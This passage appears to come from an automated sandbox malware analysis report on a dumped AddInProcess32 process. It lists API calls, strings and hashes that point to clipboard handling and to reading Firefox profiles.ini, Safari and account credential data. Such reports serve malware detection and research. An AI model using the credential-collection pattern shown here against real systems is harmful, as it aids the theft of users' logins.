                                                                                                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                    • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                  Similarity
                                                                                                  • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                                                                  • String ID:
                                                                                                  • API String ID: 1828521557-0
                                                                                                  APIs
                                                                                                    • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                    • Part of subcall function 004062A6: SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                                  • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,?,00000000,0040627C), ref: 00406942
                                                                                                  Similarity
                                                                                                  • API ID: ??2@FilePointermemcpy
                                                                                                  • String ID:
                                                                                                  • API String ID: 609303285-0
                                                                                                  Similarity
                                                                                                  • API ID: _wcsicmp
                                                                                                  • String ID:
                                                                                                  • API String ID: 2081463915-0
                                                                                                  APIs
                                                                                                    • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                                                                                    • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                  • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                                                    • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: File$CloseCreateErrorHandleLastRead
                                                                                                  • String ID:
                                                                                                  • API String ID: 2136311172-0
                                                                                                  • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                  • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                                                                  • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                  • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                                                                  APIs
                                                                                                    • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ??2@??3@
                                                                                                  • String ID:
                                                                                                  • API String ID: 1936579350-0
                                                                                                  • Opcode ID: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                                                                                                  • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                                                                                  • Opcode Fuzzy Hash: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                                                                                                  • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: free
                                                                                                  • String ID:
                                                                                                  • API String ID: 1294909896-0
                                                                                                  • Opcode ID: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                                                  • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                                                                                  • Opcode Fuzzy Hash: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                                                  • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: free
                                                                                                  • String ID:
                                                                                                  • API String ID: 1294909896-0
                                                                                                  • Opcode ID: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                                                  • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                                                                                  • Opcode Fuzzy Hash: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                                                  • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: free
                                                                                                  • String ID:
                                                                                                  • API String ID: 1294909896-0
                                                                                                  • Opcode ID: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                                                                                  • Instruction ID: e7ff0dbf640816315c9486a8db62c76896ac9b8339bf6d895034c27267ad2de3
                                                                                                  • Opcode Fuzzy Hash: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                                                                                  • Instruction Fuzzy Hash: A5A022A200820023CC00AB3CCC02A0A33880EE323EB320B0EB032C20C2CF38C830B00E
                                                                                                  APIs
                                                                                                  • EmptyClipboard.USER32 ref: 004098EC
                                                                                                    • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                                                  • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00409927
                                                                                                  • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                                                                                  • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                                                  • GetLastError.KERNEL32 ref: 0040995D
                                                                                                  • CloseHandle.KERNEL32(?), ref: 00409969
                                                                                                  • GetLastError.KERNEL32 ref: 00409974
                                                                                                  • CloseClipboard.USER32 ref: 0040997D
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                                                                  • String ID:
                                                                                                  • API String ID: 3604893535-0
                                                                                                  • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                                  • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                                                                                                  • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                                  • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                                                                                                  APIs
                                                                                                  • EmptyClipboard.USER32 ref: 00409882
                                                                                                  • wcslen.MSVCRT ref: 0040988F
                                                                                                  • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 004098AC
                                                                                                  • memcpy.MSVCRT(00000000,?,00000002,?,?,?,00411A1E,-00000210), ref: 004098B5
                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 004098BE
                                                                                                  • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                                                                                  • CloseClipboard.USER32 ref: 004098D7
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
                                                                                                  • String ID:
                                                                                                  • API String ID: 1213725291-0
                                                                                                  • Opcode ID: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                                                                  • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                                                                                                  • Opcode Fuzzy Hash: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                                                                  • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                                                                                                  APIs
                                                                                                  • GetLastError.KERNEL32 ref: 004182D7
                                                                                                    • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                  • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                                                                  • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                                                                  • LocalFree.KERNEL32(?), ref: 00418342
                                                                                                  • free.MSVCRT ref: 00418370
                                                                                                    • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,74DEDF80,?,0041755F,?), ref: 00417452
                                                                                                    • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
                                                                                                  • String ID: OsError 0x%x (%u)
                                                                                                  • API String ID: 2360000266-2664311388
                                                                                                  • Opcode ID: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                                                  • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                                                                                  • Opcode Fuzzy Hash: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                                                  • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ??2@??3@memcpymemset
                                                                                                  • String ID:
                                                                                                  • API String ID: 1865533344-0
                                                                                                  • Opcode ID: f3de4b73387da6c78884f7b0b81a8c47798430fc751eec9b9c4e2da2d29500ae
                                                                                                  • Instruction ID: 142cde259e2f0f6626273334703b570cf32d48e622dac596d848113b95f58250
                                                                                                  • Opcode Fuzzy Hash: f3de4b73387da6c78884f7b0b81a8c47798430fc751eec9b9c4e2da2d29500ae
                                                                                                  • Instruction Fuzzy Hash: D7113C71900209EFDF10AF95C805AAE3B71FF09325F04C16AFD15662A1C7798E21EF5A
                                                                                                  APIs
                                                                                                  • GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Version
                                                                                                  • String ID:
                                                                                                  • API String ID: 1889659487-0
                                                                                                  • Opcode ID: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                                                                                  • Instruction ID: 34334e4c1a53cba42546035453d5331cf18162d9798f59f763323439a3546438
                                                                                                  • Opcode Fuzzy Hash: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                                                                                  • Instruction Fuzzy Hash: BAE0463590131CCFEB24DB34DB0B7C676F5AB08B46F0104F4C20AC2092D3789688CA2A
                                                                                                  APIs
                                                                                                  • NtdllDefWindowProc_W.NTDLL(?,?,?,?,00401B0D,?,?,?), ref: 004018D2
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: NtdllProc_Window
                                                                                                  • String ID:
                                                                                                  • API String ID: 4255912815-0
                                                                                                  • Opcode ID: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                                                                  • Instruction ID: 27e4c09127093a565ccbabfb03fa630377511b1425115cef73ae3fc8c8acf6c4
                                                                                                  • Opcode Fuzzy Hash: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                                                                  • Instruction Fuzzy Hash: BEC0483A108200FFCA024B81DD08D0ABFA2BB98320F00C868B2AC0403187338022EB02
                                                                                                  APIs
                                                                                                  • _wcsicmp.MSVCRT ref: 004022A6
                                                                                                  • _wcsicmp.MSVCRT ref: 004022D7
                                                                                                  • _wcsicmp.MSVCRT ref: 00402305
                                                                                                  • _wcsicmp.MSVCRT ref: 00402333
                                                                                                    • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                    • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                  • memset.MSVCRT ref: 0040265F
                                                                                                  • memcpy.MSVCRT(?,?,00000011), ref: 0040269B
                                                                                                    • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                    • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                  • memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
                                                                                                  • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _wcsicmp$Freememcpy$Library$AddressLocalProcmemsetwcslen
                                                                                                  • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                                                                  • API String ID: 577499730-1134094380
                                                                                                  • Opcode ID: dd22fc70d251945153f84157bbedf09d5f9a0a96f25b2184ec3973dd1390e5a3
                                                                                                  • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                                                                                  • Opcode Fuzzy Hash: dd22fc70d251945153f84157bbedf09d5f9a0a96f25b2184ec3973dd1390e5a3
                                                                                                  • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                                                                  • String ID: :stringdata$ftp://$http://$https://
                                                                                                  • API String ID: 2787044678-1921111777
                                                                                                  • Opcode ID: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                                                                  • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                                                                                  • Opcode Fuzzy Hash: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                                                                  • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                                                                                                  APIs
                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                                                                  • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                                                                  • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                                                                  • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                                                                  • GetWindowRect.USER32(?,?), ref: 00414088
                                                                                                  • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                                                                  • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                                                                  • GetDC.USER32 ref: 004140E3
                                                                                                  • wcslen.MSVCRT ref: 00414123
                                                                                                  • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                                                                  • ReleaseDC.USER32(?,?), ref: 00414181
                                                                                                  • _snwprintf.MSVCRT ref: 00414244
                                                                                                  • SetWindowTextW.USER32(?,?), ref: 00414258
                                                                                                  • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                                                                  • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                                                                  • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                                                                  • GetClientRect.USER32(?,?), ref: 004142E1
                                                                                                  • GetWindowRect.USER32(?,?), ref: 004142EB
                                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                                                                  • GetClientRect.USER32(?,?), ref: 0041433B
                                                                                                  • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                                                                  • String ID: %s:$EDIT$STATIC
                                                                                                  • API String ID: 2080319088-3046471546
                                                                                                  • Opcode ID: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                                                  • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                                                                                  • Opcode Fuzzy Hash: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                                                  • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                                                                                  APIs
                                                                                                  • EndDialog.USER32(?,?), ref: 00413221
                                                                                                  • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                                                                  • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                                                                  • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                                                                  • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                                                                  • memset.MSVCRT ref: 00413292
                                                                                                  • memset.MSVCRT ref: 004132B4
                                                                                                  • memset.MSVCRT ref: 004132CD
                                                                                                  • memset.MSVCRT ref: 004132E1
                                                                                                  • memset.MSVCRT ref: 004132FB
                                                                                                  • memset.MSVCRT ref: 00413310
                                                                                                  • GetCurrentProcess.KERNEL32 ref: 00413318
                                                                                                  • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                                                                  • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                                                                  • memset.MSVCRT ref: 004133C0
                                                                                                  • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                                                                  • memcpy.MSVCRT(?,0045AA90,0000021C), ref: 004133FC
                                                                                                  • wcscpy.MSVCRT ref: 0041341F
                                                                                                  • _snwprintf.MSVCRT ref: 0041348E
                                                                                                  • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                                                                  • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                                                                  • SetFocus.USER32(00000000), ref: 004134B7
                                                                                                  Strings
                                                                                                  • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                                                                  • {Unknown}, xrefs: 004132A6
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                                  • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                                  • API String ID: 4111938811-1819279800
                                                                                                  • Opcode ID: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                                                  • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                                                                                  • Opcode Fuzzy Hash: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                                                  • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                                                                                  APIs
                                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                                                                  • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                                                                  • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                                                                  • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                                                                  • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                                                                  • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                                                                  • SetCursor.USER32(00000000,?,?), ref: 0040129E
                                                                                                  • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                                                                  • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                                                                  • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                                                                  • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                                                                  • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                                                                  • EndDialog.USER32(?,?), ref: 0040135E
                                                                                                  • DeleteObject.GDI32(?), ref: 0040136A
                                                                                                  • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                                                                  • ShowWindow.USER32(00000000), ref: 00401398
                                                                                                  • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                                                                  • ShowWindow.USER32(00000000), ref: 004013A7
                                                                                                  • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                                                                  • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                                                                  • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                                                                  • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                                  • String ID:
                                                                                                  • API String ID: 829165378-0
                                                                                                  • Opcode ID: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                                                  • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                                                                                  • Opcode Fuzzy Hash: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                                                  • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                                                                                  APIs
                                                                                                  • memset.MSVCRT ref: 00404172
                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                  • wcscpy.MSVCRT ref: 004041D6
                                                                                                  • wcscpy.MSVCRT ref: 004041E7
                                                                                                  • memset.MSVCRT ref: 00404200
                                                                                                  • memset.MSVCRT ref: 00404215
                                                                                                  • _snwprintf.MSVCRT ref: 0040422F
                                                                                                  • wcscpy.MSVCRT ref: 00404242
                                                                                                  • memset.MSVCRT ref: 0040426E
                                                                                                  • memset.MSVCRT ref: 004042CD
                                                                                                  • memset.MSVCRT ref: 004042E2
                                                                                                  • _snwprintf.MSVCRT ref: 004042FE
                                                                                                  • wcscpy.MSVCRT ref: 00404311
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                                                                  • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                                                                  • API String ID: 2454223109-1580313836
                                                                                                  • Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                                  • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
